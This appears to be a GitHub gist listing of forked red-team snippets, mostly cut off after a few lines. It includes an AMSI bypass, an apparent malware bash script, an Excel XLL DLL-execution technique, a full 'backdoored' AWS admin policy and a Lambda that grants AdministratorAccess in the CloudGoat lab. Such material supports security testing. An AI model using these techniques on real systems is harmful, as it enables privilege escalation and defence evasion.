sasqwatch / AMSIScanBufferBypass.cs

Created May 6, 2019 23:42 — forked from TheWover/AMSIScanBufferBypass.cs

Working full program for AMSIScanBufferBypass from Cyber Ark: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/

	using System;
	using System.Runtime.InteropServices;

	namespace AMSIBypass2
	{
	class Program
	{

	[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
	static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);

sasqwatch / bashscript.sh

Created May 6, 2019 18:59 — forked from JohnLaTwC/bashscript.sh

Bash script: 077d51016727216dd6216a3722353be274288d411a6295a5d804d251dacd88fc

	#!/bin/bash
	SHELL=/bin/sh
	PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
	#This is the Old-ReBuild Lady job copy
	#
	#Goal:
	# The goal of this campaign is as follows;
	# - To keep the internet safe.
	# - To keep them hackers from causing real damage to organisations.
	# - We know you feel We are a potential threat, well We ain't.

sasqwatch / test_chain_reaction.ps1

Created May 3, 2019 18:25

MITRE ATT&CK Group 0007

	Import-Module .\execution-frameworks\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam.psm1
	$G0007 = @("T1002","T1003","T1005","T1014","T1027","T1037","T1040","T1056","T1057","T1059","T1064","T1070","T1071","T1074","T1075","T1083","T1085","T1086","T1090"
	,"T1099","T1105","T1107","T1113","T1114","T1119","T1122","T1134","T1137","T1140","T1158","T1173" )
	foreach ($technique in $G0007)
	{
	try
	{
	New-Variable -Name "$technique" -Value (Get-AtomicTechnique ".\atomics\$technique\$technique.yaml")
	}
	catch {}

sasqwatch / 01. setup.sh

Created May 1, 2019 22:21 — forked from Integralist/01. setup.sh

Kali Linux Vim + Bash setup

	# use VirtualBox's device menu to insert Guest Additions CDROM
	# copy VBoxLinuxAdditions.run from mounted CDROM
	# then eject the CDROM, run the script and then shutdown the VM
	# you'll then go into VirtualBox and setup shared directories etc

	cd ~ && eject /media/cdrom0
	sudo chmod 755 VBoxLinuxAdditions.run
	./VBoxLinuxAdditions.run

	curl https://raw.githubusercontent.com/git/git/master/contrib/completion/git-prompt.sh -o ~/.git-prompt.sh

sasqwatch / Rulz.py

Created May 1, 2019 21:57 — forked from monoxgas/Rulz.py

	#!/usr/bin/env python
	# Rulz.py
	# Author: Nick Landers (@monoxgas) - Silent Break Security

	import os
	import sys
	import argparse
	import re
	import binascii
	import codecs

sasqwatch / prepare-kali.sh

Created May 1, 2019 21:55 — forked from mgeeky/prepare-kali.sh

A script that prepares Kali by collecting many useful tools of trade in /root/tools directory, installing requirements, seting them up, preparing .bashrc etc.

	#!/bin/bash

	# Well, entire Kali installation assume that we are normally working as root on our Kali.
	# I know that assumption sucks to its root, but I wanted to avoid every "permission denied" issue and I was too lazy
	# to get it done properly as a non-root.
	if [ $EUID -ne 0 ]; then
	echo "This script must be run as root."
	exit 1
	fi

sasqwatch / ExcelXLL.md

Created April 27, 2019 00:28 — forked from mgeeky/ExcelXLL.md

Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

sasqwatch / backdoored-aws-policy.json

Created April 27, 2019 00:28 — forked from mgeeky/backdoored-aws-policy.json

Example of a Backdoored AWS policy to be used in iam:CreatePolicyVersion privilege escalation vector (aws iam create-policy-version --policy-document)

	{
	"Version": "2012-10-17",
	"Statement": [
	{
	"Action": "*",
	"Effect": "Allow",
	"Resource": "*"
	}
	]
	}

sasqwatch / lambda-backdoor-cloudgoat-role.py

Created April 27, 2019 00:28 — forked from mgeeky/lambda-backdoor-cloudgoat-role.py

Lambda that backdoors CloudGoat's lambda-dynamodb-cloudgoat role by granting it an AdministratorAccess managed role. As soon as this Lambda gets invoked by HTTP event - it will return temporary AWS session credentials.


	import boto3
	import json

	POLICIES_TO_ATTACH = [
	'arn:aws:iam::aws:policy/AdministratorAccess',
	]

	ROLE_TO_BACKDOOR = 'lambda-dynamodb-cloudgoat'

sasqwatch / Native-Windows-Useragents-malicious.txt

Created April 26, 2019 19:06 — forked from GossiTheDog/Native-Windows-Useragents-malicious.txt

Native Windows UserAgents for Threat Hunting

	//Invoke-WebRequest in Powershell - manually whitelist legit content first:
	Mozilla/WindowsPowerShell/

	System.Net.WebClient.DownloadFile():
	None

	//Start-BitsTransfer - manually whitelist legit content first:
	Microsoft BITS/*

	//certutil.exe - manually whitelist legit content first: